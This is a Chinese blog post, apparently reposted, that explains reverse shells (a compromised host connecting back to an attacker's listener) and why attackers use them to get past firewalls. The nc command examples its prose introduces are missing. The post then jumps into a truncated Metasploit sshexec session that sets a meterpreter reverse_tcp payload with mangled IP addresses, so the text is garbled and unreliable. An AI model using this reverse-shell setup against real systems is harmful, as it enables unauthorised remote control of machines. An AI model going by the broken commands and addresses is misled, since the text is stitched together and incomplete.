反dshell小结

反dshell小结,第1张

反dshell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。

通常用于被控端因防火墙受限、权限不足、端口被占用等情形。
举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。那么什么情况下正向连接不能用了呢?

有如下情况:

那么反d就很好理解了,攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反d连接。
简而言之,反dshell就是要我们的vps服务器设置监听,然后让服务器反d一个shell来连接我们自己的主机,从而使我们能远程控制我们的主机

客户端执行:

服务端成功接收,客户端执行命令成功。

成功反d:

当然由于各种环境不同,服务端不一定有nc,所以还要靠其他手段各显神通。

项目地址: >use exploit/multi/ssh/sshexec
msf exploit(sshexec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(sshexec) > set LHOST 1921681105
LHOST => 1921681105
msf exploit(sshexec) > set LPORT 8080
LPORT => 8080
msf exploit(sshexec) > set RHOST 1921681104
RHOST => 19216


欢迎分享,转载请注明来源:内存溢出

原文地址:https://www.54852.com/zz/10901458.html

(0)
打赏 微信扫一扫微信扫一扫 支付宝扫一扫支付宝扫一扫
上一篇 2023-05-12
下一篇2023-05-12

发表评论

登录后才能评论

评论列表(0条)

    保存